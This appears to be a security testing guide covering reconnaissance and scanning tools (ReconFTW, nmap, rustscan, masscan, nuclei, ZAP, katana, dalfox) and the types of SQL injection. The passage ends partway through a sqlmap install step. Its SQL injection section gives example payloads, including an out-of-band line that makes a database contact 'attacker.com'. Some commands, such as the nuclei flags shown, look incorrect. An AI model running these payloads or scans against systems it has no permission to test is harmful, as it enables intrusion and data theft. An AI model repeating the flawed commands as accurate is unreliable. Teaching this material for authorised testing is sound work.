The output file `httpx_output.txt` will contain information on the HTTP response code, response time, and any other relevant information for each subdomain tested. You can use this information to identify any subdomains that are potentially vulnerable or interesting for further testing.


# ReconFTW

All-in-One Tool

**ReconFTW** automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.

<figure><img src="https://4139606766-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Clpj5NNgy3m0M7WnVOl%2Fuploads%2Fk951DIs9b3rhrmARXjlu%2Fimage.png?alt=media&amp;token=e665b56c-e381-4af8-b67f-9aa032a4eb03" alt=""><figcaption><p><a href="https://github.com/six2dez/reconftw">https://github.com/six2dez/reconftw</a></p></figcaption></figure>

ReconFTW uses a lot of techniques (passive, brute-force, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you to get the maximum and the most interesting subdomains so that you be ahead of the competition.

It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target.

*Is good to mention that, since ReconFTW is willing to install all the tools needed, we recommend you to install it using this script in a new VM or use the docker version*

Here are the steps to install ReconFTW using the install script on your PC, VPS, or VM:

1. Clone the ReconFTW repository:

```bash
git clone https://github.com/six2dez/reconftw.git
```

2. Change into the reconFTW directory:

```bash
cd reconftw
```

3. Make the install script executable:

```bash
chmod +x install. sh
```

4. Run the install script:

```bash
./install.sh
```

This will install the required dependencies, configure the environment, and install ReconFTW. The installation process may take a while, depending on the speed of your system and network connection.

Once the installation is complete, you can run ReconFTW by typing the following command:

```
reconftw
```

5. To perform a full reconnaissance on the domain "example.com", you can run the following command:

```
reconftw example.com
```

This will gather information on the target domain, including subdomains, IP addresses, and open ports, and store the results in a directory named after the target domain.

Note that the reconnaissance process can take a while, depending on the size of the target domain and the amount of information that needs to be gathered.

ReconFTW provides a number of options for customizing the reconnaissance process. You can find more information on these options by running the following command:

```python
reconftw --help
```

This will display the help information for the tool, which includes a description of each option and how to use it.

These are the basic steps for installing and using ReconFTW for domain reconnaissance using the install script. With this tool, you can gather a wealth of information on a target domain, which can be useful for penetration testing, bug hunting, and other security-related activities.

### Install using Docker

### Docker Image 🐳 (3 options)

* Pull the image

```bash
$ docker pull six2dez/reconftw:main
```

* Run the container

```bash
$ docker run -it --rm \
  -v "${PWD}/OutputFolder/":'/reconftw/Recon/' \
  six2dez/reconftw:main -d example.com -r
```

However, if you wish to:

1. Dynamically modify the behavior & function of the image
2. Build your own container
3. Build an Axiom Controller on top of the official image

Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation.


# Fingerprint

Fingerprinting, also known as fingerprint analysis, is a technique used during the reconnaissance phase of a security assessment or penetration testing engagement. The goal of fingerprinting is to gather information about a target system or network and to identify the type of operating system, web server, application server, and other software components that are being used. This information can then be used to determine the potential vulnerabilities of the system and to tailor the assessment or attack to the specific target.

Fingerprinting can be performed passively, by analyzing the responses of the target system to various probes and requests, or actively, by sending specific requests and analyzing the responses to determine the specific software components and versions in use. The information gathered during fingerprinting can be used to identify the potential weaknesses and vulnerabilities of the target system, determine the best approach for an assessment or attack, and increase the chances of success.

Fingerprinting is a crucial step in the reconnaissance phase of a security assessment or penetration testing engagement, as it provides the necessary information to plan and execute the assessment or attack effectively.

### Passive Fingerprint

Passive fingerprinting is a method of fingerprinting that does not generate any network traffic or generate log entries on the target system. This method is used to avoid detection and to gather information about the target system without disrupting its operation. Here are some steps you could follow to perform a passive fingerprint of hosts and endpoints on example.com:

1. Collect Information from Public Sources: Start by gathering information about the target system from publicly available sources, such as the domain's WHOIS information, DNS records, and web pages. This information can provide valuable information about the target system and its configuration.
2. Analyze Network Traffic: Observe network traffic to the target domain, example.com, to gather information about the target system. This can be done by monitoring network traffic at the perimeter of the network or by capturing packets using a packet sniffer such as Wireshark. Look for patterns in the traffic, such as the type of traffic, the frequency of requests, and the size of the packets, which can provide clues about the target system.
3. Analyze Web Server Responses: Analyze the responses from the web server of example.com to gather information about the server's configuration. Pay attention to the server's response headers, which can provide information about the web server software, operating system, and server-side technologies.
4. Analyze SSL/TLS Certificates: If the target system uses SSL/TLS certificates, you can gather information about the certificates, including the certificate authority, expiration date, and key size, to determine the security posture of the target system.
5. Analyze Application Behavior: Observe the behavior of the applications running on example.com to gather information about the target system. Look for patterns in the application's behavior, such as the types of requests it makes, the response time, and the error messages it generates.


# Nmap

To fingerprint the hosts on example.com, you can use the `nmap` tool. Here's how you can do it:

1. Install `nmap`: If you don't have `nmap` installed, you can download and install it from the official website (<https://nmap.org/download.html>).
2. Run the following command:

```bash
sudo nmap -sV -O example.com
```

* The `-sV` option is used to determine the service and version information of the target hosts.
* The `-O` option is used to enable OS detection and fingerprinting.

3. Analyze the output: The output will show the IP addresses and hostnames of the targets, along with the detected open ports and the services running on them. You'll also see the OS fingerprint and version information.

<figure><img src="https://4139606766-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F2Clpj5NNgy3m0M7WnVOl%2Fuploads%2FY0HSS1COonnIbIyiJBqB%2Fimage.png?alt=media&amp;token=3fc9f0ed-8ca5-4879-8bd3-249f70f8ee08" alt=""><figcaption><p>result of the nmap scan on example.com</p></figcaption></figure>

### Using nmap to scan a list of subdomains

You can use `nmap` in combination with the subdomains enumerated by `subfinder` to fingerprint the targets. Here's how you can do it:

1. Save the output of enumeration: Save the output of `subfinder` to a file. For example:

```bash
subfinder -d example.com > subdomains.txt
```

4. Run the following command:

```bash
nmap -sV -iL subdomains.txt
```

* The `-sV` option is used to determine the service and version information of the target hosts.
* The `-iL` option is used to specify a file containing a list of targets to scan.

### Running nmap with Default set of scripts

To run all the `nmap` scripts on the example.com domain, you can use the following command:

```bash
nmap -sC -sV example.com
```

* The `-sC` option is used to enable the default set of scripts for vulnerability detection and service fingerprinting.
* The `-sV` option is used to determine the service and version information of the target hosts.

### Detecting CVEs using nmap

To detect Common Vulnerabilities and Exposures (CVEs) on the example.com domain using `nmap`, you can use the following command:

```bash
nmap --script vuln example.com
```

* The `--script vuln` option is used to enable the `nmap` vulnerability detection scripts.

The output of the command will show the IP addresses and hostnames of the targets, along with the detected open ports and the services running on them. You'll also see the results of the `nmap` vulnerability detection scripts, including any CVEs or vulnerabilities that they detect.


# Rustscan

For large ammount of hosts

RustScan is a modern take on the port scanner. Sleek & fast. All while providing extensive extendability to you.

Not to mention RustScan uses Adaptive Learning to improve itself over time, making it the best port scanner for **you**.

To install Rustscan on your system, you'll need to install Rust programming language first. You can do so by following the instructions below:

#### [Installing `rustup` on Linux or macOS](https://doc.rust-lang.org/book/ch01-01-installation.html#installing-rustup-on-linux-or-macos) <a href="#installing-rustup-on-linux-or-macos" id="installing-rustup-on-linux-or-macos"></a>

If you’re using Linux or macOS, open a terminal and enter the following command:

```console
$ curl --proto '=https' --tlsv1.3 https://sh.rustup.rs -sSf | sh
```

The command downloads a script and starts the installation of the `rustup` tool, which installs the latest stable version of Rust. You might be prompted for your password. If the install is successful, the following line will appear:

```
Rust is installed now. Great!
```

You will also need a *linker*, which is a program that Rust uses to join its compiled outputs into one file. It is likely you already have one. If you get linker errors, you should install a C compiler, which will typically include a linker. A C compiler is also useful because some common Rust packages depend on C code and will need a C compiler.

On macOS, you can get a C compiler by running:

```console
$ xcode-select --install
```

Linux users should generally install GCC or Clang, according to their distribution’s documentation. For example, if you use Ubuntu, you can install the `build-essential` package.

#### [Installing `rustup` on Windows](https://doc.rust-lang.org/book/ch01-01-installation.html#installing-rustup-on-windows) <a href="#installing-rustup-on-windows" id="installing-rustup-on-windows"></a>

On Windows, go to <https://www.rust-lang.org/tools/install> and follow the instructions for installing Rust. At some point in the installation, you’ll receive a message explaining that you’ll also need the MSVC build tools for Visual Studio 2013 or later.

To acquire the build tools, you’ll need to install [Visual Studio 2022](https://visualstudio.microsoft.com/downloads/). When asked which workloads to install, include:

* “Desktop Development with C++”
* The Windows 10 or 11 SDK
* The English language pack component, along with any other language pack of your choosing

The rest of this book uses commands that work in both *cmd.exe* and PowerShell. If there are specific differences, we’ll explain which to use.

#### [Troubleshooting](https://doc.rust-lang.org/book/ch01-01-installation.html#troubleshooting) <a href="#troubleshooting" id="troubleshooting"></a>

To check whether you have Rust installed correctly, open a shell and enter this line:

```console
$ rustc --version
```

You should see the version number, commit hash, and commit date for the latest stable version that has been released, in the following format:

```
rustc x.y.z (abcabcabc yyyy-mm-dd)
```

If you see this information, you have installed Rust successfully! If you don’t see this information, check that Rust is in your `%PATH%` system variable as follows.

In Windows CMD, use:

```console
> echo %PATH%
```

In PowerShell, use:

```powershell
> echo $env:Path
```

In Linux and macOS, use:

```console
$ echo $PATH
```

If that’s all correct and Rust still isn’t working, there are a number of places you can get help. Find out how to get in touch with other Rustaceans (a silly nickname we call ourselves) on [the community page](https://www.rust-lang.org/community).

### Time to Rustscan

Once you have installed the Rust programming language, you can install Rustscan by using the following command in your terminal:

```bash
sudo cargo install rustscan
```

To fingerprint the hosts on `example.com`, you can run the following command in your terminal:

```bash
rustscan example.com -t 50 -- -oA output_file
```

This will scan the top 50 most commonly used ports on `example.com` and write the output to a file in the format specified with `-oA` option (in this case, it's `output_file`). The output will contain the open ports and the services running on those ports. This information can be useful in determining the type of operating system and the services running on a target host.

### Using Rustscan with Nmap

Rustscan is a fast port scanner, but it does not perform vulnerability scanning. To scan for vulnerabilities, you'll need to use a vulnerability scanner such as `nmap`. You can use Rustscan to gather information about open ports on a target system, and then use this information to perform a vulnerability scan with `nmap`.

Here's an example of how you could use Rustscan and `nmap` to scan for vulnerabilities on `example.com`:

1. First, use Rustscan to gather information about open ports on the target system:

```bash
$ rustscan -a example.com -t 50 -- -oA rustscan_output
```

Just in case of receiving a message like that:

\[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers \[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.

Run again adding the option suggested by rustscan

```bash
$ rustscan -a example.com -t 50 --ulimit 5000 -- -oA rustscan_output
```

2. Next, use the information gathered by Rustscan to perform a vulnerability scan with `nmap`:

```bash
nmap -iL rustscan_output -p- -A --script vuln -oA nmap_output
```

The `-iL` option specifies the input file containing the list of targets, in this case, the file generated by Rustscan (`rustscan_output`). The `-p-` option specifies that all ports should be scanned. The `-A` option enables OS detection, version detection, script scanning, and traceroute. The `--script vuln` option enables vulnerability scanning using `nmap`'s vulnerability detection scripts. The `-oA` option specifies the output file format (in this case, `nmap_output`).


# Masscan

Mass IP port scanner

### Installing Masscan

Masscan can be installed on various operating systems, including Windows, Linux, and macOS. Here are the steps to install Masscan on different platforms:

### Linux

Masscan can be easily installed on a Linux machine using the package manager. For example, if you are using a Debian-based distribution, such as Ubuntu or Mint, you can use the following command:

```bash
sudo apt-get install masscan
```

If you are using a Red Hat-based distribution, such as Fedora or CentOS, you can use the following command:

```bash
sudo yum install masscan
```

### Windows

To install Masscan on Windows, you need to first install the WinPcap library, which provides low-level network access required by Masscan. You can download the WinPcap library from the official website at <https://www.winpcap.org/>.

Once you have installed WinPcap, you can download Masscan from the official GitHub repository at <https://github.com/robertdavidgraham/masscan>. Extract the contents of the downloaded archive, and then open a command prompt or terminal window in the Masscan directory.

To compile Masscan on Windows, you can use the following command:

```powershell
make -j
```

### macOS

To install Masscan on macOS, you need to first install the Xcode Command Line Tools, which provides the necessary development tools for compiling Masscan. You can install the Xcode Command Line Tools by running the following command:

```bash
xcode-select --install
```

Once you have installed the Xcode Command Line Tools, you can download Masscan from the official GitHub repository at <https://github.com/robertdavidgraham/masscan>. Extract the contents of the downloaded archive, and then open a terminal window in the Masscan directory.

To compile Masscan on macOS, you can use the following command:

```bash
make -j
```

### Using Masscan for Fast Port Scanning on Subdomains

Masscan is a fast port scanner that can be used to enumerate ports on all subdomains of a domain. To use masscan for this task, you would need to first obtain a list of all subdomains for the domain in question. This can typically be done using a tool like Subfinder or a simple bash script.

Once you have a list of subdomains, you can use masscan to scan each subdomain for open ports. Here's an example command that you could use:

```bash
masscan -p1-65535 -iL subdomains.txt -oG subdomain_scan_results.txt
```

In this command, `-p1-65535` specifies the range of ports to scan (in this case, all 65535 possible ports), `-iL subdomains.txt` specifies the input file containing the list of subdomains to scan, and `-oG subdomain_scan_results.txt` specifies the output format and the file to store the results in.

Once the scan is complete, you can review the results in the `subdomain_scan_results.txt` file to see which ports are open on each subdomain.

### Combining Masscan with Nmap

By combining Masscan and Nmap, you can quickly identify open ports on a target and then use Nmap to gather more detailed information about the services running on those ports.

Here's an example of how you can use Masscan to scan a target and pipe the results directly to Nmap:

```bash
masscan -p1-65535 [target] | awk '{print $6}' | sort -u | xargs -I{} nmap -p{} [target]
```

In this command, `masscan -p1-65535 [target]` scans the target for open ports, and the output is piped to `awk '{print $6}'`. The `awk` command filters the Masscan output to extract only the open ports, which are then sorted and passed as arguments to Nmap using `sort -u | xargs -I{} nmap -p{} [target]`.

The `nmap` command then scans the target for the specific open ports, providing detailed information about the services running on those ports. The results of the Nmap scan will be displayed on the terminal.


# Scanning Phase

The scanning phase is the process of actively probing a target system to gather information about its components and vulnerabilities. The purpose of this phase is to identify potential attack vectors, determine the target's attack surface, and create a map of the target's systems and services. This information can then be used to focus later stages of the pentest on areas that are most likely to contain vulnerabilities.

During the scanning phase, a pentester or a bug hunter typically employs a variety of tools and techniques, including network scans, port scans, vulnerability scans, and active reconnaissance. These tools can be used to identify open ports and services, determine operating systems and software versions, and gather information about the target's network infrastructure. The goal of this phase is to create a comprehensive view of the target's systems and networks, including any potential weaknesses that can be exploited later in the test.

It's important to note that the scanning phase is an active and intrusive process, and it may result in the generation of log data and alerts that could be detected by the target's security measures. Therefore, it's essential for pentesters or bug hunters to be cautious and take appropriate steps to minimize the risk of detection and disruption during this phase of the test, depending on the type of the test.


# OpenVAS

The Greenbone Vulnerability Manager is a modular security auditing tool, used for testing remote systems for vulnerabilities that should be fixed.

This package installs all the required packages. It provides scripts to setup, start and stop the GVM services.

The tool was previously named OpenVAS.

**Installed size:** `48 KB`\
**How to install:** `sudo apt install gvm`

{% code overflow="wrap" %}

```bash
root@kali:~# gvm-check-setup -h
gvm-check-setup 22.4.0
  Test completeness and readiness of GVM-22.4.0
Step 1: Checking OpenVAS (Scanner)... 
        OK: OpenVAS Scanner is present in version 22.4.0.
        OK: Notus Scanner is present in version 22.4.1.
        OK: Server CA Certificate is present as /var/lib/gvm/CA/servercert.pem.
Checking permissions of /var/lib/openvas/gnupg/*
        OK: _gvm owns all files in /var/lib/openvas/gnupg
        OK: redis-server is present.
        OK: scanner (db_address setting) is configured properly using the redis-server socket: /var/run/redis-openvas/redis-server.sock
        ERROR: redis-server is not running or not listening on socket: /var/run/redis-openvas/redis-server.sock
        FIX: You should start the redis-server with 'systemctl start redis-server@openvas.service' or configure it to listen on socket: /var/run/redis-openvas/redis-server.sock

 ERROR: Your GVM-22.4.0 installation is not yet complete!

Please follow the instructions marked with FIX above and run this
script again.
```

{% endcode %}

{% code overflow="wrap" %}

```bash
/root@kali:~# gvm-setup -h

[>] Starting PostgreSQL service

[>] Creating GVM's certificate files

[>] Creating PostgreSQL database
[i] User _gvm already exists in PostgreSQL
[i] Database gvmd already exists in PostgreSQL
[i] Role DBA already exists in PostgreSQL

[*] Applying permissions
GRANT ROLE
[i] Extension uuid-ossp already exists for gvmd database
[i] Extension pgcrypto already exists for gvmd database
[i] Extension pg-gvm already exists for gvmd database
[>] Migrating database
[>] Checking for GVM admin user
[*] Configure Feed Import Owner
[>] Updating GVM feeds
[*] Updating NVT (Network Vulnerability Tests feed from Greenbone Security Feed/Community Feed)
```

{% endcode %}

## Under construction


# Nuclei

## What is Nuclei?

Nuclei is used to send requests across targets based on a template, leading to zero false positives and providing fast scanning on many hosts. Nuclei offers scanning for a variety of protocols, including TCP, DNS, HTTP, SSL, File, Whois, Websocket, Headless, etc. With powerful and flexible templating, Nuclei can be used to model all kinds of security checks.

## Installation

To install Nuclei using the `go install` command, follow these steps:

1. Open a terminal window and navigate to the directory where you want to install Nuclei.
2. Run the following command:

```
go install github.com/projectdiscovery/nuclei@latest
```

This will download and install the latest version of Nuclei.

3. Once the installation is complete, you can verify that Nuclei is installed correctly by running the following command:

```
nuclei --version
```

This should output the version number of Nuclei that you have installed.

**Note:** If you are using a version of Go that is older than 1.16, you may need to use the following command to install Nuclei:

```
go get -u github.com/projectdiscovery/nuclei
```

**Usage:**

Once Nuclei is installed, you can start using it to scan for vulnerabilities. To do this, you need to create a template file. Template files are YAML files that contain the instructions for Nuclei to follow when scanning for vulnerabilities.

You can find a variety of template files on the Nuclei website. Once you have a template file, you can use the following command to scan a target:

```
nuclei -t <template-file> <target>
```

For example, to scan the website `https://example.com` for vulnerabilities, you would use the following command:

```
nuclei -t web/common.yaml https://example.com
```

Nuclei will output a report of the vulnerabilities that it finds. You can then use this report to remediate the vulnerabilities.

**Additional notes:**

* The `go install` command will install Nuclei to the `$GOBIN` directory, which is typically `/usr/local/go/bin`.
* If you want to install Nuclei to a different directory, you can use the `-d` flag with the `go install` command. For example, to install Nuclei to the `/opt/nuclei` directory, you would use the following command:

```
go install -d /opt/nuclei github.com/projectdiscovery/nuclei@latest
```

### Usage

To use Nuclei, you need to first create a template file. Template files are YAML files that contain the instructions for Nuclei to follow when scanning for vulnerabilities. You can find a variety of template files on the Nuclei website.

Once you have a template file, you can use the following command to scan a target:

```
nuclei -t <template-file> <target>
```

For example, to scan the website `https://example.com` for vulnerabilities, you would use the following command:

```
nuclei -t web/common.yaml https://example.com
```

Nuclei will output a report of the vulnerabilities that it finds. You can then use this report to remediate the vulnerabilities.

**Here are some additional tips for using Nuclei:**

* You can use the `-l` flag to specify a list of targets to scan.
* You can use the `-o` flag to specify the output file for the scan results.
* You can use the `-v` flag to increase the verbosity of the scan output.
* You can use the `-r` flag to recursively scan all subdomains of a target.
* You can use the `-c` flag to specify the number of concurrent workers to use during the scan.

**Example usage:**

To scan the website `https://example.com` for vulnerabilities, and save the results to a file called `results.txt`, you would use the following command:

```
nuclei -t web/common.yaml -o results.txt https://example.com
```

To scan all subdomains of the website `https://example.com` for vulnerabilities, you would use the following command:

```
nuclei -t web/common.yaml -r https://example.com
```

To scan the website `https://example.com` for vulnerabilities using 10 concurrent workers, you would use the following command:

```
nuclei -t web/common.yaml -c 10 https://example.com
```


# OWASP Zap

## Introduction to OWASP ZAP

The OWASP Zed Attack Proxy (ZAP) is a free and open-source tool designed for security testing of web applications. It serves as a "man-in-the-middle" proxy, intercepting and inspecting messages between your browser and the web application, allowing you to identify and address potential vulnerabilities.

### Installation

ZAP is available for Windows, Linux, and macOS. Follow these steps to install it:

1. **Download**: Visit the [official ZAP download page](https://www.zaproxy.org/download/) and select the appropriate installer for your operating system.
2. **Install**:
   * **Windows**: Run the downloaded installer and follow the on-screen instructions.
   * **Linux**: Extract the downloaded package and execute the installation script.
   * **macOS**: Open the downloaded package and drag the ZAP icon into your Applications folder.
3. **Java Requirement**: Ensure that Java 11 or higher is installed on your system, as ZAP requires it to run. The macOS installer includes the necessary Java version.

### Basic Usage

After installation, you can begin using ZAP to test your web applications:

1. **Launch ZAP**: Open the ZAP application on your system.
2. **Configure Your Browser**: Set your browser to use ZAP as a proxy. By default, ZAP listens on `localhost` at port `8080`. This configuration allows ZAP to intercept and analyze the traffic between your browser and the web application. For detailed instructions on configuring proxies, refer to the [ZAP documentation](https://www.zaproxy.org/docs/desktop/start/proxies/).
3. **Explore the Application**: Navigate through your web application, accessing various pages and functionalities. ZAP will record all requests and responses during this exploration.
4. **Spider the Application**: Use ZAP's Spider tool to automatically discover URLs and resources within the application that you might have missed during manual exploration. The Spider tool analyzes the application's structure and identifies additional endpoints.
5. **Active Scan**: Perform an Active Scan to detect common vulnerabilities. ZAP will send various requests to the application, attempting to identify security issues such as SQL injection, cross-site scripting (XSS), and more.
6. **Review Alerts**: After the scan, examine the alerts generated by ZAP. These alerts provide information about potential vulnerabilities, including their severity and recommendations for remediation.

For more detailed guidance and advanced features, consult the [ZAP Getting Started Guide](https://www.zaproxy.org/getting-started/).


# NMAP

## Introduction to Nmap

Nmap, short for Network Mapper, is a free and open-source tool used for network exploration and security auditing. It allows users to discover hosts and services on a computer network, thus creating a "map" of the network. Nmap is widely used for network inventory, managing service upgrade schedules, and monitoring host or service uptime.

### Installation

Nmap is available for various operating systems, including Windows, Linux, and macOS. To install Nmap:

* **Windows**: Download the installer from the [official Nmap download page](https://nmap.org/download.html) and follow the on-screen instructions.
* **Linux**: Use your distribution's package manager. For example, on Debian-based systems:

  ```bash
  sudo apt-get install nmap
  ```
* **macOS**: Use a package manager like Homebrew:

  ```bash
  brew install nmap
  ```

### Basic Usage

Once installed, Nmap can be used to perform various network scanning tasks. Here are some basic examples:

#### 1. Scanning a Single Host

To scan a single host and list open ports:

```bash
nmap 192.168.1.1
```

This command will display the open ports and the services running on them.

#### 2. Scanning Multiple Hosts

To scan multiple hosts:

```bash
nmap 192.168.1.1 192.168.1.2 192.168.1.3
```

Or, to scan a range of IP addresses:

```bash
nmap 192.168.1.1-10
```

#### 3. Scanning an Entire Subnet

To scan an entire subnet:

```bash
nmap 192.168.1.0/24
```

This will scan all 256 IP addresses in the subnet.

#### 4. Service Version Detection

To detect the version of services running on open ports:

```bash
nmap -sV 192.168.1.1
```

This provides detailed information about the services detected.

#### 5. Operating System Detection

To detect the operating system of a host:

```bash
nmap -O 192.168.1.1
```

This attempts to determine the operating system of the target host.

#### 6. Combining Scans

You can combine different scan options. For example, to perform service version detection and operating system detection together:

```bash
nmap -sV -O 192.168.1.1
```

### Example Output

Here is an example of Nmap output for a scan on a single host:

```kotlin
Starting Nmap 7.80 ( https://nmap.org ) at 2024-11-05 10:23 UTC
Nmap scan report for 192.168.1.1
Host is up (0.00097s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
```

This output indicates that the host at 192.168.1.1 has ports 22, 80, and 443 open, corresponding to SSH, HTTP, and HTTPS services, respectively.

### Additional Resources

For more detailed information and advanced usage, refer to the [Nmap Reference Guide](https://nmap.org/book/man.html#man-description).


# Looking for Parameters with Katana

## Katana

Identifying URL Parameters

Katana is a high-speed web crawler developed by ProjectDiscovery, designed for automation pipelines and capable of both headless and non-headless crawling. It excels at discovering endpoints and parameters within web applications, making it a valuable tool for security assessments and web analysis.

### Installation

Katana requires Go 1.18 or later. To install:

```bash
CGO_ENABLED=1 go install github.com/projectdiscovery/katana/cmd/katana@latest
```

Alternatively, download the pre-compiled binary from the [release page](https://github.com/projectdiscovery/katana/releases).

### Basic Usage

To identify URL parameters using Katana, follow these steps:

1. **Run Katana with the Query URL Filter**: Use the `-f qurl` option to filter and display URLs containing query parameters.

   ```bash
   katana -u https://example.com -f qurl
   ```

   This command crawls `https://example.com` and outputs URLs that include query parameters.
2. **Process Multiple URLs**: To analyze multiple URLs, create a file (e.g., `urls.txt`) with each URL on a new line.

   ```bash
   katana -list urls.txt -f qurl
   ```

   This command processes each URL in `urls.txt` and extracts those with query parameters.
3. **Integrate with Other Tools**: Katana can be integrated into workflows with other tools. For instance, combining Katana with [Nuclei](https://github.com/projectdiscovery/nuclei) allows for fuzzing of discovered endpoints.

   ```bash
   katana -u https://example.com -f qurl -o endpoints.txt
   nuclei -list endpoints.txt -t fuzzing-templates/
   ```

   This sequence discovers endpoints with parameters and then applies fuzzing templates to test for vulnerabilities.

### Additional Options

Katana offers various options to customize its behavior:

* **Depth Control**: Use the `-d` option to set the maximum crawl depth.

  ```bash
  katana -u https://example.com -d 2 -f qurl
  ```

  This limits the crawl to two levels deep.
* **Scope Control**: The `-cs` (crawl scope) and `-cos` (crawl out scope) options allow you to define in-scope and out-of-scope URL patterns using regular expressions.

  ```bash
  katana -u https://example.com -cs "example.com" -cos "logout"
  ```

  This configuration includes URLs containing "example.com" and excludes those containing "logout".
* **Headless Crawling**: Enable headless mode with the `-hl` option to render JavaScript-heavy pages.

  ```bash
  katana -u https://example.com -hl -f qurl
  ```

  This approach is beneficial for applications that rely heavily on JavaScript.

For a comprehensive list of options and detailed usage instructions, refer to the [Katana documentation](https://github.com/projectdiscovery/katana/blob/main/README.md).

By leveraging Katana's capabilities, you can efficiently identify and analyze URL parameters within web applications, enhancing your security assessments and web analysis processes.


# Searching for XSS

## Detecting Cross-Site Scripting (XSS) Vulnerabilities with Dalfox

Cross-Site Scripting (XSS) is a prevalent security vulnerability that allows attackers to inject malicious scripts into web applications, potentially compromising user data and application integrity. Dalfox is a powerful open-source tool designed to automate the detection of XSS vulnerabilities, streamlining the process for security professionals and developers.

### What is Dalfox?

Dalfox, short for "Finder of XSS," is an advanced XSS scanning tool and parameter analyzer. It offers a robust testing engine and various features tailored for efficient XSS detection and verification. Dalfox supports multiple scanning modes, including single URL scanning, pipeline mode, and file-based scanning, making it versatile for different testing scenarios.

[GitHub](https://github.com/hahwul/dalfox)

### Installation

Dalfox can be installed using various methods:

* **Using Go**:

  Ensure you have Go installed, then run:

  ```bash
  go install github.com/hahwul/dalfox/v2@latest
  ```
* **Using Homebrew** (for macOS and Linux):

  ```bash
  brew install dalfox
  ```
* **Using Docker**:

  Pull the latest Dalfox Docker image:

  ```bash
  docker pull hahwul/dalfox:latest
  ```

  Run Dalfox using Docker:

  ```bash
  docker run -it hahwul/dalfox:latest /app/dalfox url https://example.com
  ```

For detailed installation instructions, refer to the [Dalfox documentation](https://dalfox.hahwul.com/docs/installation/).

### Basic Usage

Dalfox offers several modes to accommodate different testing needs:

* **Single URL Scanning**:

  Scan a single URL for XSS vulnerabilities:

  ```bash
  dalfox url https://example.com
  ```
* **Pipeline Mode**:

  Read URLs from standard input and scan them:

  ```bash
  cat urls.txt | dalfox pipe
  ```
* **File Mode**:

  Scan multiple URLs listed in a file:

  ```bash
  dalfox file urls.txt
  ```

Dalfox also supports advanced options such as blind XSS testing, custom payloads, and parameter mining. For a comprehensive list of features and usage examples, consult the [Dalfox README](https://github.com/hahwul/dalfox/blob/main/README.md).

### Integrating Dalfox with Katana

Katana is a high-speed web crawler developed by ProjectDiscovery, designed for automation pipelines and capable of both headless and non-headless crawling. It excels at discovering endpoints and parameters within web applications, making it a valuable tool for security assessments and web analysis.

By integrating Katana with Dalfox, you can enhance your XSS detection workflow. Katana can be used to discover URLs and parameters, which can then be fed into Dalfox for XSS scanning.

**Example Workflow**:

1. **Use Katana to Discover URLs with Parameters**:

   ```bash
   katana -u https://example.com -f qurl -o urls_with_params.txt
   ```

   This command instructs Katana to crawl `https://example.com`, filter for URLs containing query parameters, and output the results to `urls_with_params.txt`.
2. **Scan Discovered URLs with Dalfox**:

   ```bash
   dalfox file urls_with_params.txt
   ```

   Dalfox will read the URLs from `urls_with_params.txt` and scan each for potential XSS vulnerabilities.

This integration leverages Katana's efficient crawling capabilities to identify potential injection points, which are then thoroughly tested by Dalfox for XSS vulnerabilities.

By combining the strengths of both tools, you can establish a comprehensive and automated approach to detecting XSS vulnerabilities in web applications.


# SQL Injection (SQLi)

## Understanding and Mitigation

SQL Injection (SQLi) is a critical security vulnerability that allows attackers to interfere with the queries an application makes to its database. By injecting malicious SQL code, attackers can access, modify, or delete data without proper authorization.

### Types of SQL Injection

Understanding the various types of SQL Injection is essential for effective prevention and mitigation. The primary types include:

#### 1. In-Band SQL Injection

In-Band SQL Injection is the most straightforward and common type, where the attacker uses the same communication channel to both launch the attack and gather results. It has two subtypes:

* **Error-Based SQL Injection**: The attacker manipulates the database to produce error messages, which can reveal information about the database structure.

  *Example*:

  ```sql
  SELECT * FROM users WHERE id = 1' AND 1=CONVERT(int, (SELECT @@version))--
  ```

  This query attempts to force the database to display its version, which can aid in crafting further attacks.
* **Union-Based SQL Injection**: The attacker uses the UNION SQL operator to combine the results of the original query with the results of a malicious query.

  *Example*:

  ```sql
  SELECT name, email FROM users WHERE id = 1 UNION SELECT username, password FROM admin--
  ```

  This query combines user data with administrative credentials, potentially exposing sensitive information.

#### 2. Inferential (Blind) SQL Injection

In Inferential SQL Injection, the attacker sends payloads and observes the application's response to infer information about the database. This type does not return data directly but relies on behavioral analysis. It has two subtypes:

* **Boolean-Based Blind SQL Injection**: The attacker sends queries that result in different responses based on whether the query returns TRUE or FALSE.

  *Example*:

  ```sql
  SELECT * FROM users WHERE id = 1 AND 1=1-- (Validates as TRUE)
  SELECT * FROM users WHERE id = 1 AND 1=2-- (Validates as FALSE)
  ```

  By analyzing the application's response to these queries, the attacker can deduce information about the database.
* **Time-Based Blind SQL Injection**: The attacker sends queries that cause the database to delay its response, allowing inference based on the time taken to respond.

  *Example*:

  ```sql
  SELECT * FROM users WHERE id = 1; IF (1=1) WAITFOR DELAY '00:00:10'--
  ```

  If the application delays its response, the attacker infers that the condition is TRUE.

#### 3. Out-of-Band SQL Injection

Out-of-Band SQL Injection relies on the database's ability to make external network connections. Attackers use this method when in-band and inferential techniques are ineffective.

*Example*:

```sql
SELECT * FROM users; EXEC xp_dirtree '\\attacker.com\share'--
```

This query attempts to make the database server connect to the attacker's server, potentially exfiltrating data.

### sqlmap: Automated SQL Injection Tool

sqlmap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL Injection vulnerabilities. It supports a wide range of databases, including MySQL, PostgreSQL, Oracle, and Microsoft SQL Server.

**Key Features**:

* Automatic detection of SQL Injection vulnerabilities.
* Support for various SQL Injection techniques.
* Database fingerprinting and data extraction.
* Execution of commands on the operating system via out-of-band connections.

#### **Installation**:

sqlmap can be installed by cloning its [GitHub repository](https://github.com/sqlmapproject/sqlmap):

```bash
